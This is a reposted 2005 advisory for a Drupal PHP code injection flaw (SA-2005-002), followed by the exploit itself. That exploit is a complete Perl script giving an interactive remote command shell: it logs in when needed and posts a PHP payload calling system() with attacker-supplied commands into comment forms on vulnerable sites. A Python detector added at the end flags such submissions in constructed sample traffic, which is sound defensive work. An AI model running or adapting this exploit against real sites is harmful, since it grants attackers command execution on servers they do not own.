Drupal Code Injection
Source: dab@digitalsec.net  Author: dab  Published: 2005-07-07

Drupal Code Injection (SA-2005-002, Exploit)

Summary
A flaw in the input validation routines of Drupal's filter mechanism allows attackers to execute arbitrary PHP code on a target site when public comments or postings are allowed.

Credit:
The information has been provided by dab.

Details
Vulnerable Systems:
* Drupal versions 4.5.0, 4.5.1, 4.5.2, 4.5.3, 4.6.0 and 4.6.1

Immune Systems:
* Drupal versions 4.5.4 and 4.6.2

Exploit:
#!/usr/bin/perl
# Mon Jul 4 18:19:35 CEST 2005 dab at digitalsec.net
#
# DRUPAL-SA-2005-002 php injection in comments (yes, its lame)
# Hax0r code here, read before execute
#
# Run without arguments to show the help.
#
# BLINK! BLINK! BLINK! BLINK!
#
# Feel free to port to another stupid script language (mIRC,
# python, TCL or orthers), and send to securiteam (AGAIN)
#
# Theo, this one hasn't been tested in BSD.. yet!
# infohacking: there're a lot of xss in drupal, contact me if you want
# to program some exploits.
#
# BLINK! BLINK! BLINK! BLINK!
#
#
# HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE
# contact me for pricing and offerings.
#
# !dSR: yubiiiiii yeooooooooooo
#
use LWP::UserAgent;
use HTTP::Cookies;
use LWP::Simple;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;
use strict;

$| = 1; # ;1 = |$

my ($proxy,$proxy_user,$proxy_pass);
my ($host,$debug,$drupal_user,$drupal_pass);
my $options = GetOptions (
'host=s' => \$host,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'drupal_user=s' => \$drupal_user,
'drupal_pass=s' => \$drupal_pass,
'debug' => \$debug);

&help unless ($host);

while (1){
print "druppy461\$ ";
my $cmd = <STDIN>;
&druppy($cmd);
}
exit (1); # could be replaced with exit(2)

sub druppy {
chomp (my $cmd = shift);
LWP::Debug::level('+') if $debug;

my $ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" }); # this is a random feature
$ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!");

if ($drupal_user) { # no need to exploit
my ($mhost, $h);
if ($host =~ /(http:\/\/.*?)\?q=/) {
$mhost = $1;
$h = $mhost . "?q=user/login";
} #some magic hacking here
else {
$host =~ /(.*?)\/.*?\//; $mhost =$1;
$h = $mhost . "/user/login";
}
print $h . "\n" if $debug;
my $req = POST $h,[
'edit[name]' => "$drupal_user",
'edit[pass]' => "$drupal_pass"
]; #grab these, and send to dsr!
print $req->as_string() if $debug;
my $res = $ua->request($req);
print $res->content() if $debug;
if ($res->is_redirect eq 1) {
print "Logged\n" if $debug;
}
}

$ua->proxy(['http'] => $proxy) if $proxy;
my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
my $res = $ua->get("$host");
my $html = $res->content();
my @op; # buffer overflow here
foreach (split(/\n/,$html)) {
if ( m/name="op" value="(.*?)"/){
push(@op,$1);
}
}# xss here

my $ok = 0; # globlal for admin purposes
foreach my $op (@op) {
my $req = POST "$host",[
'edit[subject]' => 'test',
'edit[comment]' =>
"<?php print(\"BLAH\\n\");system(\"$cmd\"); print(\"BLAH\\n\"); php?>",
'edit[format]' => '2',
'edit[cid]' => "", # drupal is sick.. it doesn't need arguments
'edit[pid]' => "", # they use it to grab some statistycal information
'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal
'op' => "$op"
];

print $req->as_string() if $debug;
my $res = $ua->request($req);
my $html = $res->content();
print $html if $debug;
foreach (split(/\n/,$html)) {
return if $ok gt "1"; # super hack de phrack
if (/BLAH/) { $ok++; next }
print "$_\n" if $ok eq "1"; # /n is for another line in screen
}
}
}

sub help {
print "Syntax: ./$0 <url> [options]\n";
print "\t--drupal_user, --drupal_pass (needed if dont allow anonymous posts)\n";
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
print "\t--debug\n";
print "\nExample\n";
print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n";
print "\n";
exit(1);
}

#sub 0day_solaris {
# please put your code here
#}

#EoF
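The exploit above is noisy in two ways a defender can key on: it POSTs a PHP open tag in the edit[comment] field of a comment/reply form, and it sends a fixed User-Agent string. The following detector is an added example, not part of the advisory or of dab's script; it runs over constructed request records (method, path, User-Agent, decoded form fields) as a WAF or application logger might emit them, and the record layout is an assumption.

```python
"""Flag Drupal comment submissions that carry PHP code (DRUPAL-SA-2005-002 pattern).

Added example, not from the original advisory. The field names edit[comment]
and the q=comment/reply path come from the published exploit; the Request
record format is an assumption about what a WAF/app logger provides.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# PHP long open tag or short echo tag anywhere in the comment body.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Comment reply form, either clean-URL style or ?q= style.
COMMENT_PATH = re.compile(r"(?:\?q=|/)comment/reply/\d+", re.IGNORECASE)
# User-Agent the published exploit sends verbatim.
EXPLOIT_UA = "Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"


@dataclass
class Request:
    method: str
    path: str
    user_agent: str
    form: Dict[str, str] = field(default_factory=dict)


def inspect(req: Request) -> List[str]:
    """Return the reasons this request looks like SA-2005-002 abuse; empty if clean."""
    reasons: List[str] = []
    if req.method.upper() != "POST" or not COMMENT_PATH.search(req.path):
        return reasons  # only comment submissions are in scope
    if PHP_OPEN_TAG.search(req.form.get("edit[comment]", "")):
        reasons.append("php-open-tag-in-comment")
    if req.user_agent == EXPLOIT_UA:
        reasons.append("known-exploit-user-agent")
    return reasons


def scan(requests: List[Request]) -> Dict[int, List[str]]:
    """Map request index -> reasons, for every request that raised at least one."""
    findings: Dict[int, List[str]] = {}
    for i, req in enumerate(requests):
        reasons = inspect(req)
        if reasons:
            findings[i] = reasons
    return findings


# Constructed sample traffic: one exploit-style POST, one benign comment, one GET.
SAMPLE = [
    Request("POST", "/?q=comment/reply/1", EXPLOIT_UA,
            {"edit[subject]": "test", "edit[comment]": "<?php phpinfo(); ?>", "edit[format]": "2"}),
    Request("POST", "/?q=comment/reply/7", "Mozilla/5.0",
            {"edit[subject]": "hi", "edit[comment]": "Nice post, thanks!", "edit[format]": "1"}),
    Request("GET", "/?q=comment/reply/1", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE).items():
        print(f"request {idx}: {', '.join(reasons)}")
```

Only the PHP-tag rule generalises; the User-Agent rule catches this one script and nothing else, and on a site whose comment formats should never execute PHP, any match on the first rule is worth a look regardless of the second.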
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved